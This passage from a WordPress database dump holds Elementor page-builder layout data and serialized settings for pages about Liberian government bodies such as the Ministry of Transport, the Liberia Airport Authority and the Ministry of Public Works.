(27480,3991,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2d39894\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.<\\/p><p>Through its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"52624ff6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"6d47854\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3c330365\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"30a16cc2\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mot\\\",\\\"tag_id\\\":\\\"62\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mot\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6bd3aa21\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"69e27fd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df2b844\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9e5ee94\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mot\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27481,3991,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27482,3991,'_thumbnail_id','3215'),(27484,1598,'internet','https://mot.gov.lr/'),(27485,1598,'_pods_institution_logo','a:1:{i:0;i:2683;}'),(27486,1598,'institution_logo','2683'),(27487,3992,'_elementor_edit_mode','builder'),(27488,3992,'_elementor_template_type','wp-post'),(27489,3992,'_elementor_version','2.7.5'),(27490,3992,'_wp_page_template','default'),(27491,3992,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fee7624\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia Airport Authority Information coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0cfc190\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"ef8085e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"197521f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1214e7c\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"laa\\\",\\\"tag_id\\\":\\\"55\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"laa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2241ab5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e6ea64b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4015db0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3742cd2\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:laa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27492,3992,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27493,3992,'_thumbnail_id','3217'),(27494,3993,'_elementor_edit_mode','builder'),(27495,3993,'_elementor_template_type','wp-post'),(27496,3993,'_elementor_version','2.7.5'),(27497,3993,'_wp_page_template','default'),(27498,3993,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fee7624\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia Airport Authority Information coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0cfc190\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"ef8085e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"197521f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1214e7c\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"laa\\\",\\\"tag_id\\\":\\\"55\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"laa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2241ab5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e6ea64b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4015db0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3742cd2\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:laa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27499,3993,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27500,3993,'_thumbnail_id','3217'),(27501,1596,'internet','https://web.facebook.com/LiberiaLAA/?_rdc=1&_rdr'),(27502,1596,'_pods_institution_logo','a:1:{i:0;i:2282;}'),(27503,1596,'institution_logo','2282'),(27504,3994,'_elementor_edit_mode','builder'),(27505,3994,'_elementor_template_type','wp-post'),(27506,3994,'_elementor_version','2.7.5'),(27507,3994,'_wp_page_template','default'),(27508,3994,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting\\/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, 